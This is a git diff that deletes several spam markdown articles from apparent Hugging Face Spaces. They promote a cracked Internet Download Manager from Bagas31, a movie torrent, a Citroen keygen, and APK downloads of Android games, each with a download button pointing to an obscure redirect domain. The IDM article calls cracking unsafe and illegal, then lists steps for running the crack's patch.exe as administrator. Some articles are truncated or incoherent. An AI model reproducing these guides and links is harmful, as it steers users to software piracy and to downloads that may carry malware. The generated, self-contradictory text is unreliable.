diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download IDM Full Crack Bagas31 - Is It Safe and Legal?.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download IDM Full Crack Bagas31 - Is It Safe and Legal?.md deleted file mode 100644 index 0c314e807366424287f3e4ca519f299a2376fa99..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download IDM Full Crack Bagas31 - Is It Safe and Legal?.md +++ /dev/null @@ -1,37 +0,0 @@ - -

How to Download IDM Full Crack Bagas31 for Free

-

IDM, or Internet Download Manager, is a popular program that helps you download files from the internet faster and more easily. It can increase your download speed up to 5 times, resume and schedule downloads, and manage your downloaded files efficiently. It can also download videos from various websites, such as YouTube, Vimeo, and others.

-

download idm full crack bagas31


DOWNLOAD ––– https://byltly.com/2uKxFo



-

However, IDM is not free software. You need to pay for a license or serial key to use it without limitations or interruptions. If you don't want to spend money on IDM, you may be tempted to look for a cracked version that bypasses the registration process and lets you use it for free. One of the websites that offers IDM full crack for free download is Bagas31.

-

Bagas31 is a website that provides various software and games for free download. It also provides IDM full crack with the latest version and updates. But is it safe and legal to download IDM full crack Bagas31? What are the risks and benefits of using IDM full crack Bagas31? In this article, we will answer these questions and provide you with a guide on how to download IDM full crack Bagas31 for free.

- -

Is It Safe and Legal to Download IDM Full Crack Bagas31?

-

The answer to this question is no. Downloading IDM full crack Bagas31 is neither safe nor legal. Here are some of the reasons why:

- The cracked files may contain malware, viruses, or spyware that can damage your PC or steal your data
- Using a cracked version of IDM violates its license agreement and infringes the developer's copyright, which is illegal
- A cracked version cannot receive official updates or support, so it may stop working or remain vulnerable to bugs

- -

Therefore, downloading IDM full crack Bagas31 is not a wise choice. You may end up losing more than what you gain. You may also put yourself in danger or trouble by using a cracked software.

- -

How to Download IDM Full Crack Bagas31 for Free

-

If you still want to try downloading IDM full crack Bagas31 for free, despite the risks and drawbacks, here are the steps that you need to follow:

-

-
  1. Go to https://bagas31.pw/
  2. Search for IDM full crack in the search box or browse through the categories
  3. Select the latest version of IDM full crack that matches your system requirements
  4. Click on the download button and wait for the download to finish
  5. Extract the file with WinRAR v6.1 or later
  6. Run the setup.exe file and install Internet Download Manager full version on your PC
  7. Close the application from the tray icon and copy the patch.exe file to C:\Program Files (x86)\Internet Download Manager
  8. Run the patch.exe file as administrator and click on the Patch button
  9. Enjoy using IDM full crack for free!
- -

A Better Alternative to Downloading IDM Full Crack Bagas31

-

If you want a better and safer alternative to downloading IDM full crack Bagas31, you should consider using a legitimate and reputable data recovery program that offers a quality, reliable data recovery service without any risks or drawbacks. One such program is FoneDog Data Recovery.

-

Fone

-
-
\ No newline at end of file diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download The Jupiter - Il Destino Delluniverso Full Movie Italian Dubbed In Torrent.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download The Jupiter - Il Destino Delluniverso Full Movie Italian Dubbed In Torrent.md deleted file mode 100644 index 1e3dd4193519b38f3aea57eec72c79805319ec27..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download The Jupiter - Il Destino Delluniverso Full Movie Italian Dubbed In Torrent.md +++ /dev/null @@ -1,20 +0,0 @@ -
-

Download the Jupiter - Il destino dell'universo full movie italian dubbed in torrent

- -

Jupiter - Il destino dell'universo (Jupiter Ascending) is a 2015 science fiction movie written and directed by the Wachowskis, starring Mila Kunis and Channing Tatum. It is the Wachowskis' first movie made in 3D.

-

Download the Jupiter - Il destino dell'universo full movie italian dubbed in torrent


Download Zip →→→ https://byltly.com/2uKzU7



- -

The movie tells the story of Jupiter Jones (Mila Kunis), a girl with a very special genetic code. She works as a maid for her wealthy neighbors, but she dreams of a better future. One day, she discovers that she is the object of desire of a family of noble aliens who want to exploit her for their own benefit. She is rescued by Caine (Channing Tatum), a mercenary half-man half-dog, who takes her on an adventure across the galaxy to reveal her true destiny.

- -

If you want to watch the Italian-dubbed version of this movie, you can download it via torrent from this link: https://example.com/jupiter-ascending-italian-torrent. You will need a torrent client such as uTorrent or BitTorrent to download the file. Make sure you have enough space on your device and a good internet connection.

- -

Jupiter - Il destino dell'universo is a movie full of action, adventure and fantasy, with stunning visual effects and a captivating soundtrack by Michael Giacchino. It is a movie that will take you beyond the known, through space and into unknown realms. Don't miss this opportunity to download it via torrent and enjoy it at home!

-

- -

The movie features a talented cast of actors and actresses, who bring to life the complex and diverse characters of the story. Mila Kunis plays Jupiter Jones, a humble and courageous heroine who discovers her royal heritage and fights for her freedom. Channing Tatum plays Caine Wise, a loyal and brave protector who falls in love with Jupiter and helps her in her quest. Sean Bean plays Stinger Apini, a former comrade of Caine who joins them in their mission. Eddie Redmayne plays Balem Abrasax, the eldest and most ruthless of the Abrasax siblings, who wants to harvest Earth for his own profit. Douglas Booth plays Titus Abrasax, the youngest and most charming of the Abrasax siblings, who tries to seduce Jupiter and trick her into marrying him. Tuppence Middleton plays Kalique Abrasax, the middle and most mysterious of the Abrasax siblings, who seems to have a hidden agenda behind her kindness.

- -

The movie also features a cameo appearance by Terry Gilliam, who plays a minister in a bureaucratic scene that pays homage to his movie Brazil. Other supporting actors include James D'Arcy as Max Jones, Jupiter's father; Bae Doona as Razo, a bounty hunter; Tim Pigott-Smith as Malidictes, Balem's henchman; Vanessa Kirby as Katharine Dunlevy, Jupiter's friend; Jeremy Swift as Vasilliy Bolodnikov, Jupiter's uncle; Ramon Tikaram as Phylo Percadium, an Aegis captain; and Maria Doyle Kennedy as Aleksa, Jupiter's mother.

- -

Jupiter - Il destino dell'universo is a movie that explores themes such as identity, destiny, family, love, greed, power and rebellion. It is a movie that challenges the status quo and celebrates the potential of every individual. It is a movie that invites you to dream big and reach for the stars. Download it now in torrent and join Jupiter and Caine in their epic journey!

-
-
\ No newline at end of file diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Citroen Service Box Keygen Free WORK Download.md b/spaces/1gistliPinn/ChatGPT4/Examples/Citroen Service Box Keygen Free WORK Download.md deleted file mode 100644 index 941c6cee57c51514b1efa62a0e3ffac74299a8ad..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Citroen Service Box Keygen Free WORK Download.md +++ /dev/null @@ -1,11 +0,0 @@ -
-


-

citroen service box keygen free download


Download » https://imgfil.com/2uxXju



-

-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Age of History II APK A Wasteland Editor and Flag Maker for Android Wargamers.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Age of History II APK A Wasteland Editor and Flag Maker for Android Wargamers.md deleted file mode 100644 index b46fc87c18ae5aa9ee2e587f830e6a57fd76ca16..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Age of History II APK A Wasteland Editor and Flag Maker for Android Wargamers.md +++ /dev/null @@ -1,98 +0,0 @@ -
-

Download Age of History II APK - A Grand Strategy Wargame for Android

-

Are you a fan of history and strategy games? Do you want to experience the thrill of leading your own Civilization from the dawn of civilization to the future of mankind? If yes, then you should download Age of History II APK, a grand strategy wargame that is simple to learn yet hard to master.

-

Age of History II is a game that lets you explore the whole history of humanity, Age by Age, beginning in the Age of Civilizations and leading into the far future. You can play as many Civilizations ranging from the largest empire to the smallest tribe, and lead your people to glory in a campaign spanning thousands of years. You can also create your own scenarios and worlds using the in-game editors, and share them with other players.

-

download age of history 2 apk


Download ✏ ✏ ✏ https://urlin.us/2uST9r



-

In this article, we will tell you what is Age of History II, what are its features, how to download and install it on your Android device, and some tips and tricks for playing it. Let's get started!

-

What is Age of History II?

-

Age of History II is a grand strategy wargame developed by Łukasz Jakowski, an independent game developer from Poland. It is the sequel to Age of Civilizations, which was released in 2014. Age of History II was released in 2018 for Windows, macOS, Linux, and Android platforms.

-

Age of History II is a game that simulates the history of the world from ancient times to the far future. You can choose from hundreds of Civilizations to play as, each with their own unique culture, history, and challenges. You can also create your own custom Civilizations using the Civilization Creator tool.

-

The game has two main modes: Historical Grand Campaign and Custom Scenario. In Historical Grand Campaign, you can play through the entire history of humanity, starting from any Age you want. You can also choose from different scenarios that focus on specific regions or events, such as World War I, World War II, Cold War, Modern Day, etc.

-

In Custom Scenario, you can create your own scenarios using the Scenario Editor tool. You can set up the map, the Civilizations, the events, the rules, and everything else according to your preferences. You can also download and play scenarios made by other players from the Steam Workshop or other sources.

-

Features of Age of History II

-

Age of History II is a game that offers a lot of features and options for players who love history and strategy games. Some of these features are:

-

Detailed map of the world with many historical borders

-

The game has a detailed map of the world that covers every continent and region. The map has over 4000 provinces that represent different territories and states throughout history. The map also has many historical borders that change according to the time period and the events that happen in the game.

-

-

Deeper diplomatic system between Civilizations

-

The game has a deeper diplomatic system that allows you to interact with other Civilizations in various ways. You can declare war or peace, form alliances or coalitions, send or receive trade offers, demand or offer tribute, support or oppose revolutions, etc. You can also use diplomacy points to influence other Civilizations' opinions and actions.

-

Create own History using in-game editors

-

The game has several in-game editors that let you create your own custom content. You can use the Civilization Creator to make your own Civilizations with custom flags, names, colors, and stats. You can use the Scenario Editor to make your own scenarios with custom maps, Civilizations, events, rules, and more. You can also use the Map Editor to edit the existing map or create a new one from scratch.

-

Hotseat, play with as many players as Civilizations in scenario!

-

The game has a hotseat mode that allows you to play with your friends on the same device. You can play with as many players as there are Civilizations in the scenario, and take turns controlling your actions. You can also play online multiplayer with other players using Steam or other platforms.

-

How to download and install Age of History II APK?

-

If you want to download and install Age of History II APK on your Android device, you need to follow these steps:

-

Step 1: Download the APK file from a trusted source

-

The first step is to download the APK file of Age of History II from a trusted source. You can find the APK file on various websites that offer Android apps and games, such as APKPure, APKMirror, etc. Make sure you download the latest version of the game and check the file size and permissions before downloading.
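One simple way to act on this advice is to compare the downloaded file's SHA-256 hash with a checksum published on the download page, when one is available. Here is a minimal sketch in Python; the file name and the idea of a published checksum are illustrative, not something the sites above are guaranteed to provide:

```python
import hashlib

def sha256_of(path: str) -> str:
    """Return the SHA-256 hex digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Compare the result with the checksum listed on the download page, e.g.:
# sha256_of("age-of-history-2.apk") == "<published checksum>"
```

If the hashes do not match, the file was corrupted or tampered with in transit and should not be installed.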

-

Step 2: Enable unknown sources on your device

-

The second step is to enable unknown sources on your device. This is necessary because Age of History II is not available on the Google Play Store, and you need to allow your device to install apps from other sources. To do this, go to Settings > Security > Unknown Sources and toggle it on. You may also need to confirm this action by tapping OK or Allow.

-

Step 3: Install the APK file and launch the game

-

The third step is to install the APK file and launch the game. To do this, locate the downloaded APK file on your device using a file manager app, such as ES File Explorer, and tap on it. You may need to grant some permissions for the installation process to proceed. Once the installation is complete, you can launch the game by tapping on its icon on your home screen or app drawer.

-

Tips and tricks for playing Age of History II

-

Age of History II is a game that requires strategy, planning, and patience. If you want to succeed in this game, you need to follow some tips and tricks that will help you improve your gameplay. Here are some of them:

-

Learn the basics of the game mechanics

-

The first tip is to learn the basics of the game mechanics. You need to understand how the game works, such as how to move your units, how to fight battles, how to manage your resources, how to use diplomacy, etc. You can find tutorials and guides on the game's official website or YouTube channel that will explain these concepts in detail.

-

Choose your Civilization wisely

-

The second tip is to choose your Civilization wisely. You need to consider several factors when choosing your Civilization, such as their location, their culture, their history, their strengths and weaknesses, their goals, etc. You also need to consider the scenario you are playing and the challenges you will face. For example, if you are playing a World War II scenario, you may want to choose a Civilization that was involved in that war and has relevant units and abilities.

-

Manage your economy and military

-

The third tip is to manage your economy and military. You need to balance your income and expenses, and make sure you have enough resources to sustain your Civilization. You also need to build and upgrade your buildings, such as farms, mines, factories, barracks, etc., that will provide you with more resources and units. You also need to train and deploy your military units, such as infantry, cavalry, tanks, planes, ships, etc., that will help you defend your territory and conquer others.

-

Use diplomacy and alliances to your advantage

-

The fourth tip is to use diplomacy and alliances to your advantage. You need to interact with other Civilizations in various ways, such as declaring war or peace, forming alliances or coalitions, sending or receiving trade offers, demanding or offering tribute, supporting or opposing revolutions, etc. You can also use diplomacy points to influence other Civilizations' opinions and actions. You need to use diplomacy and alliances to your advantage, as they can help you gain allies, enemies, resources, territories, and more.

-

Conclusion

-

Age of History II is a grand strategy wargame that lets you explore the whole history of humanity, Age by Age, beginning in the Age of Civilizations and leading into the far future. You can play as many Civilizations ranging from the largest empire to the smallest tribe, and lead your people to glory in a campaign spanning thousands of years. You can also create your own scenarios and worlds using the in-game editors, and share them with other players.

-

If you want to download and install Age of History II APK on your Android device, you need to follow the steps we mentioned above. You also need to follow some tips and tricks we shared to improve your gameplay and have more fun. Age of History II is a game that will challenge your strategic skills and test your historical knowledge. Are you ready to make history?

-

FAQs

-

Here are some frequently asked questions about Age of History II:

- - - - - - -
Q: How much does Age of History II cost?
A: Age of History II costs $4.99 on Steam and $2.99 on the Google Play Store.

Q: Is Age of History II available for iOS devices?
A: No, Age of History II is not available for iOS devices at the moment.

Q: How can I update Age of History II?
A: You can update Age of History II by downloading the latest version of the APK file from a trusted source and installing it over the existing one.

Q: How can I contact the developer of Age of History II?
A: You can contact the developer of Age of History II by visiting his official website or sending him an email at jakowskidev@gmail.com.

Q: How can I support the development of Age of History II?
A: You can support the development of Age of History II by buying the game, leaving a positive review, sharing it with your friends, and donating to the developer via PayPal or Patreon.

-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Club The Most Fun and Addictive Game Ever.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Club The Most Fun and Addictive Game Ever.md deleted file mode 100644 index cf824a591ccf5a070bab928e8671fdaca3ac5de0..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Club The Most Fun and Addictive Game Ever.md +++ /dev/null @@ -1,179 +0,0 @@ -
-

Brawl Stars APK Club Indir: How to Download and Play the Popular Mobile Game

-

If you are looking for a fun and exciting mobile game that you can play with your friends or solo, you might want to check out Brawl Stars. Brawl Stars is a fast-paced multiplayer game that offers different modes, characters, and challenges for you to enjoy. In this article, we will tell you what Brawl Stars is, how to download it using APK Club or other sources, and how to play it like a pro.

-

brawl stars apk club indir


Download Ziphttps://urlin.us/2uT35k



-

What is Brawl Stars?

-

A fast-paced multiplayer game with different modes and characters

-

Brawl Stars is a mobile game developed by Supercell, the makers of Clash of Clans and Clash Royale. It is a twin-stick shooter with a MOBA twist, where you can choose from over 20 unique brawlers with different abilities and classes. You can team up with your friends or play solo across various game modes, such as Gem Grab, Showdown, Bounty, Heist, Brawl Ball, and more. Each match lasts for under three minutes, making it perfect for quick bursts of fun.

-

A free-to-play game with in-app purchases and rewards

-

Brawl Stars is free to download and play on Android and iOS devices, but it also offers in-app purchases for gems, coins, skins, and other items. Gems are the premium currency that you can use to buy brawl boxes, skins, coins, power points, and more. Coins are the regular currency that you can use to upgrade your brawlers' power level. You can also earn gems, coins, power points, and other rewards by playing the game, completing quests, opening brawl boxes, reaching milestones on Trophy Road, and participating in special events.

-

How to download Brawl Stars APK Club Indir?

-

The official way: Google Play Store or App Store

-

The easiest and safest way to download Brawl Stars is through the official Google Play Store or App Store. All you need to do is search for "Brawl Stars" on your device's store app and tap on the install button. This will ensure that you get the latest version of the game that is compatible with your device and region. You will also get automatic updates and support from Supercell.

-

The alternative way: APK Club website or other third-party sources

-

If you want to download Brawl Stars from an alternative source, such as APK Club or other third-party websites, you will need to follow some extra steps. APK Club is a website that offers free downloads of various Android apps and games, including Brawl Stars. To download Brawl Stars from APK Club, you will need to:

  1. Visit the APK Club website and search for Brawl Stars
  2. Download the latest APK file to your device
  3. Enable installation from unknown sources in your device's settings
  4. Install the APK file and launch the game

- -
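Before installing an APK obtained outside the Play Store, it is also worth a quick structural sanity check: every valid APK is a ZIP archive that contains an AndroidManifest.xml. A minimal sketch in Python follows; the file name is illustrative, and this check does not replace proper signature verification:

```python
import zipfile

def looks_like_apk(path: str) -> bool:
    """Rough sanity check: a valid APK is a ZIP archive
    containing AndroidManifest.xml."""
    if not zipfile.is_zipfile(path):
        return False
    with zipfile.ZipFile(path) as archive:
        return "AndroidManifest.xml" in archive.namelist()
```

A file that fails this check is certainly not a working APK, although passing it says nothing about whether the package has been modified.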

The pros and cons of using APK Club

-

Some of the advantages of using APK Club to download Brawl Stars are:

- You can get the game without a Google account or access to the Play Store
- You can download the game in regions where it is not officially available
- You can find older versions of the game if the latest one does not run on your device

- -

Some of the disadvantages of using APK Club to download Brawl Stars are:

- You do not get automatic updates, so you have to download and install each new version manually
- The files are not checked by Google Play Protect, so they may be outdated or modified
- You get no official support from Supercell or Google if something goes wrong

-

- -

The risks and precautions of using third-party sources

-

If you decide to download Brawl Stars from other third-party sources, such as websites, forums, or file-sharing platforms, you should be aware of the potential risks and take some precautions. Some of the risks are:

- -

Some of the precautions are:

- -

How to play Brawl Stars?

The basics: choose a brawler, join a match, and fight

-

Before you start a match, you need to choose a brawler that suits your playstyle and the game mode. You can see the stats, abilities, and skins of each brawler by tapping on them in the Brawlers menu. You can also see their power level, which indicates how much you have upgraded them with power points and coins. The higher the power level, the stronger the brawler.

-

Once you have selected a brawler, you can join a match by tapping on the Play button. You can either play with random teammates or invite your friends to join you. You can also play solo in some game modes, such as Showdown or Solo Showdown. Depending on the game mode, you will be matched with 2 to 9 other players in a map.

-

The objective of each match is different, but the basic gameplay is the same: you need to use your brawler's attacks and super to defeat your enemies and achieve your goal. You can move your brawler with the blue joystick on the left side of the screen, and aim and fire your attacks with the red joystick on the right side. You can also tap on the red joystick to quickfire, which will automatically target the nearest enemy. You can also use gadgets and star powers, which are special abilities that you unlock at higher power levels.

-

The game modes: Smash & Grab, Showdown, Bounty, Heist, Brawl Ball, and more

-

Brawl Stars offers a variety of game modes that test your skills and strategy in different ways. Here are some of the most popular game modes and how to play them:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Game Mode | Description | Objective
--- | --- | ---
Gem Grab | A 3v3 mode where gems spawn from a mine in the center of the map. | Collect and hold 10 gems for 15 seconds to win. If you die, you drop your gems.
Showdown | A solo or duo mode where 10 players fight in a shrinking map. | Be the last brawler or team standing. Collect power cubes from crates or enemies to boost your stats.
Bounty | A 3v3 mode where each kill gives you a star and increases your bounty. | Earn more stars than the enemy team by killing them. The higher your bounty, the more stars you drop when you die.
Heist | A 3v3 mode where each team has a safe to protect and attack. | Destroy the enemy safe or deal more damage to it than they do to yours.
Brawl Ball | A 3v3 mode where each team tries to score goals with a ball. | Score two goals before the enemy team or have more goals when the time runs out. You can kick or carry the ball, but you can't attack while holding it.
Siege | A 3v3 mode where each team tries to destroy the enemy's IKE turret with a siege bot. | Collect bolts to build your siege bot, which will attack the enemy turret. Destroy the enemy turret or deal more damage to it than they do to yours.
Hot Zone | A 3v3 mode where each team tries to control zones on the map. | Earn points by staying in the zones. The first team to reach 100 points or have more points when the time runs out wins.
-

The tips and tricks: use obstacles, team up, run away, and more

-

Brawl Stars is not just about shooting and smashing your enemies. You also need to use your brain and skills to outsmart and outplay them. Here are some tips and tricks that can help you improve your game:

- Use obstacles such as walls and bushes for cover, ambushes, and escapes
- Team up with your teammates and focus your fire on one enemy at a time
- Run away and hide when you are low on health, and come back when your health has regenerated
- Save your super for the right moment instead of firing it as soon as it charges

- -

Conclusion

-

A summary of the main points

-

Brawl Stars is a mobile game that you can download and play for free on your Android or iOS device. It is a multiplayer game that offers different modes, characters, and challenges for you to enjoy. You can download it from the official Google Play Store or App Store, or from alternative sources such as APK Club or other third-party websites. However, you should be aware of the pros and cons of using these sources, and take some precautions to avoid any risks. You can also improve your skills and have more fun by following some tips and tricks that we shared in this article.

-

A call to action for the readers

-

If you are interested in Brawl Stars, we encourage you to give it a try and see for yourself why it is one of the most popular mobile games in the world. You can also join the Brawl Stars community and share your feedback, opinions, questions, and suggestions with other players and developers. You can find them on social media platforms such as Facebook, Twitter, Instagram, YouTube, Reddit, Discord, and more. You can also visit the official Brawl Stars website for more information and updates on the game.

-

FAQs

-

What are the best brawlers in Brawl Stars?

-

There is no definitive answer to this question, as different brawlers have different strengths and weaknesses, and may perform better or worse depending on the game mode, map, team composition, and personal preference. However, some of the brawlers that are generally considered to be strong and versatile are:

- -

How to get new brawlers in Brawl Stars?

-

You can get new brawlers in Brawl Stars by opening brawl boxes, which are containers that contain various rewards such as coins, power points, gadgets, star powers, and brawlers. You can get brawl boxes by playing the game, completing quests, reaching milestones on Trophy Road, participating in special events, or buying them with gems. The chances of getting a new brawler depend on the rarity of the brawler and your luck. The rarer the brawler, the lower the chance of getting it. You can see the odds of getting a new brawler by tapping on the info button on the brawl box screen.

-

How to get gems and coins in Brawl Stars?

-

You can get gems and coins in Brawl Stars by playing the game, completing quests, opening brawl boxes, reaching milestones on Trophy Road, or participating in special events. You can also buy gems with real money through in-app purchases. Gems are the premium currency that you can use to buy brawl boxes, skins, coins, power points, and more. Coins are the regular currency that you can use to upgrade your brawlers' power level.

-

How to join or create a club in Brawl Stars?

-

A club is a group of players who can chat, play, and compete together in Brawl Stars. You can join or create a club by tapping on the social button on the main screen. You can search for an existing club by name or tag, or browse the recommended clubs based on your region and trophies. You can also create your own club by choosing a name, a tag, a badge, a description, and a type (open, invite only, or closed). You can invite your friends to join your club by tapping on the invite button and sending them a link. You can also leave or switch clubs at any time by tapping on the settings button and choosing the appropriate option.

-

How to contact Supercell for support or feedback?

-

If you have any issues, questions, or suggestions regarding Brawl Stars, you can contact Supercell for support or feedback by tapping on the settings button on the main screen and choosing the help and support option. You can browse the frequently asked questions or contact the support team directly by tapping on the message button. You can also visit the official Brawl Stars website for more information and updates on the game.

-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Build Your Fantasy Empire with War and Order APK for Android.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Build Your Fantasy Empire with War and Order APK for Android.md deleted file mode 100644 index 532508cfb9272c80868527083fc141f61d41f389..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Build Your Fantasy Empire with War and Order APK for Android.md +++ /dev/null @@ -1,111 +0,0 @@ -
-

War and Order APK: A Strategy Game for Android

-

If you are looking for a strategy game that combines real-time combat, tower defense, and castle building, then you might want to check out War and Order APK. This is a game that lets you build your own fantasy empire in a gorgeous 3D medieval world. You can command orcs, elves, mages, and other races to fight against enemies from all over the world. You can also join an alliance and cooperate with other players to conquer new lands and castles. In this article, we will tell you more about War and Order APK, how to download and install it, how to play it, what are its features, and what are its pros and cons.

-

What is War and Order APK?

-

War and Order APK is an Android game developed by Camel Games. It is a real-time strategy, tower defense, and castle building game that has received several global Google recommendations. It is one of the most popular games in its genre, with over 10 million downloads on Google Play.

-

-

A real-time strategy, tower defense, and castle building game

-

In War and Order APK, you can build your own empire by constructing and upgrading various buildings, such as barracks, farms, mines, workshops, walls, towers, etc. You can also recruit and train over 50 different types of soldiers, such as orcs, elves, humans, mages, beasts, angels, etc. You can use these soldiers to defend your base from enemy attacks or to attack other players' bases. You can also research new magic and technology to unlock new units, buffs, and weapons.

-

A 3D medieval game world with orcs, elves, and mages

-

War and Order APK has stunning 3D graphics that immerse you in a medieval fantasy world. You can see your buildings, soldiers, enemies, and battles in full detail. You can also zoom in or out to get a better view of the action. The game also has realistic sound effects that enhance its atmosphere.

-

A global game with players from all over the world

-

War and Order APK is not just a single-player game. You can also interact with other players from around the world in real time. You can chat with them, make friends or enemies, form alliances or rivalries. You can also fight together or against each other in huge battles that involve hundreds or thousands of players. You can also compete for rankings, rewards, territories, castles, etc.

-

How to Download and Install War and Order APK?

-

If you want to play War and Order APK on your Android device, you need to download and install the APK file first. Here are the steps to do so:

-

Download the APK file from a trusted source

-

You can download the War and Order APK file from a trusted source, such as Softonic or APKCombo. You can also scan the APK file with antivirus software before installing it to verify its safety.

-


-

Enable unknown sources on your device settings

-

Before you can install the War and Order APK file, you need to enable unknown sources on your device settings. This will allow you to install apps from sources other than Google Play. To do this, go to Settings > Security > Unknown Sources and toggle it on. You may also need to confirm this action by tapping OK or Allow.

-

Install the APK file and launch the game

-

Once you have downloaded and enabled unknown sources, you can install the War and Order APK file by tapping on it. You may need to grant some permissions to the app, such as access to storage, location, contacts, etc. After the installation is complete, you can launch the game by tapping on its icon on your home screen or app drawer.

-

How to Play War and Order APK?

-

Now that you have installed War and Order APK, you can start playing it. Here are some basic tips on how to play the game:

-

Build your own empire with various buildings and soldiers

-

The first thing you need to do in War and Order APK is to build your own empire. You can do this by constructing and upgrading various buildings, such as barracks, farms, mines, workshops, walls, towers, etc. Each building has a different function and benefit for your empire. For example, barracks allow you to recruit and train soldiers, farms produce food for your army, mines generate gold for your treasury, workshops produce materials for your weapons and equipment, walls protect your base from enemy attacks, towers provide defense and support for your troops, etc. You can also decorate your base with flags, statues, fountains, etc. to make it more attractive.

-

You also need to recruit and train soldiers for your army. You can do this by tapping on the barracks and selecting the type of unit you want to recruit. There are over 50 different types of units in War and Order APK, such as orcs, elves, humans, mages, beasts, angels, etc. Each unit has a different cost, speed, attack, defense, range, and skill. You can also upgrade your units by researching new magic and technology in the academy. You can also equip your units with weapons and armor that you can craft in the workshop or buy in the market.

-

Research new magic and technology for advanced tactics and weapons

-

Another important aspect of War and Order APK is to research new magic and technology for your empire. You can do this by tapping on the academy and selecting the type of research you want to conduct. There are four categories of research in War and Order APK: Development, Military, Defense, and Magic. Each category has several subcategories that contain various research topics. For example, Development research allows you to improve your production, storage, speed, etc., Military research allows you to unlock new units, buffs, weapons, etc., Defense research allows you to enhance your walls, towers, traps, etc., and Magic research allows you to learn new spells, runes, potions, etc. Researching new magic and technology can give you an edge over your enemies and allies in the game.

-

Join an alliance and cooperate with other players to conquer territories and castles

-

One of the most fun and exciting features of War and Order APK is to join an alliance and cooperate with other players. You can do this by tapping on the alliance button and choosing to join an existing alliance or create your own. Joining an alliance can give you many benefits, such as sharing resources, information, troops, gifts, etc. You can also chat with your alliance members, make friends or enemies, form strategies and plans, etc.

-

One of the main goals of an alliance is to conquer new territories and castles in the game world. You can do this by tapping on the map and selecting a target to attack. You can also scout, rally, reinforce, or support your allies or enemies in the map. Conquering new territories and castles can give you more resources, prestige, and power in the game. You can also defend your territories and castles from enemy attacks by building defenses and sending troops.

-

What are the Features of War and Order APK?

-

War and Order APK has many features that make it a fun and addictive game. Here are some of them:

-

Huge battles with fully animated graphics and sound effects

-

War and Order APK has huge battles that involve hundreds or thousands of players and units. You can see your soldiers fight in real time with fully animated graphics and sound effects. You can also zoom in or out to get a better view of the action. The game also has a realistic physics engine that simulates the movement, collision, and damage of the units.

-

Diverse units and races with different abilities and skills

-

War and Order APK has diverse units and races that have different abilities and skills. You can command orcs, elves, humans, mages, beasts, angels, etc. Each unit has a different cost, speed, attack, defense, range, and skill. You can also upgrade your units by researching new magic and technology. You can also equip your units with weapons and armor that you can craft or buy.

-

A dynamic world with monsters, events, and challenges

-

War and Order APK has a dynamic world that changes according to the actions of the players. You can encounter monsters, events, and challenges in the game world that can give you rewards or risks. For example, you can fight against dragons, giants, zombies, etc. that drop rare items or resources. You can also participate in events such as festivals, tournaments, sieges, etc. that offer rewards or rankings. You can also face challenges such as quests, missions, achievements, etc. that test your skills and strategy.

-

What are the Pros and Cons of War and Order APK?

-

Like any other game, War and Order APK has its pros and cons. Here are some of them:

-

Pros: Fun, addictive, and strategic gameplay; Free to play; Regular updates; Friendly community

-

War and Order APK has a fun, addictive, and strategic gameplay that can keep you entertained for hours. You can build your own empire, recruit and train your army, research new magic and technology, join an alliance, fight against other players, conquer new territories and castles, etc. The game is also free to play, although you can buy some in-game items with real money if you want to. The game also has regular updates that add new features, content, and improvements to the game. The game also has a friendly community that you can chat with, make friends or enemies, form alliances or rivalries, etc.

-

Cons: Requires internet connection; May consume battery and data; May have bugs or glitches

-

War and Order APK requires an internet connection to play, which means you cannot play it offline. The game may also consume a lot of battery and data on your device, especially if you play it for a long time or participate in large battles. The game may also have some bugs or glitches that may affect your gameplay or experience. For example, you may encounter crashes, freezes, lags, errors, etc.

-

Conclusion

-

War and Order APK is a strategy game for Android that lets you build your own fantasy empire in a 3D medieval world. You can command orcs, elves, mages, and other races to fight against enemies from all over the world. You can also join an alliance and cooperate with other players to conquer new lands and castles. The game has many features that make it fun and addictive, such as huge battles, diverse units, dynamic world, etc. The game also has some pros and cons that you should consider before playing it.

-

FAQs

-

Here are some frequently asked questions about War and Order APK:

-

Q: Is War and Order APK safe to download and install?

-

A: Yes, War and Order APK is safe to download and install as long as you get it from a trusted source. You can also scan the APK file with antivirus software before installing it to verify its safety.

-

Q: How can I get more resources in War and Order APK?

-

A: You can get more resources in War and Order APK by building and upgrading your farms, mines, workshops, etc. You can also collect resources from the map by attacking monsters, events, or other players. You can also trade resources with your alliance members or buy them with real money.

-

Q: How can I get more gems in War and Order APK?

-

A: Gems are the premium currency in War and Order APK that can be used to buy special items, speed up processes, etc. You can get more gems by completing quests, achievements, challenges, etc. You can also get gems as rewards from events, tournaments, sieges, etc. You can also get gems by participating in the daily lottery or watching ads. You can also buy gems with real money.

-

Q: How can I join or create an alliance in War and Order APK?

-

A: You can join or create an alliance in War and Order APK by tapping on the alliance button and choosing to join an existing alliance or create your own. To join an existing alliance, you need to apply for it and wait for the approval of the leader or the elders. To create your own alliance, you need to pay a certain amount of gold and choose a name, flag, and description for your alliance. You can also invite other players to join your alliance or accept their applications.

-

Q: How can I change my name, avatar, or flag in War and Order APK?

-

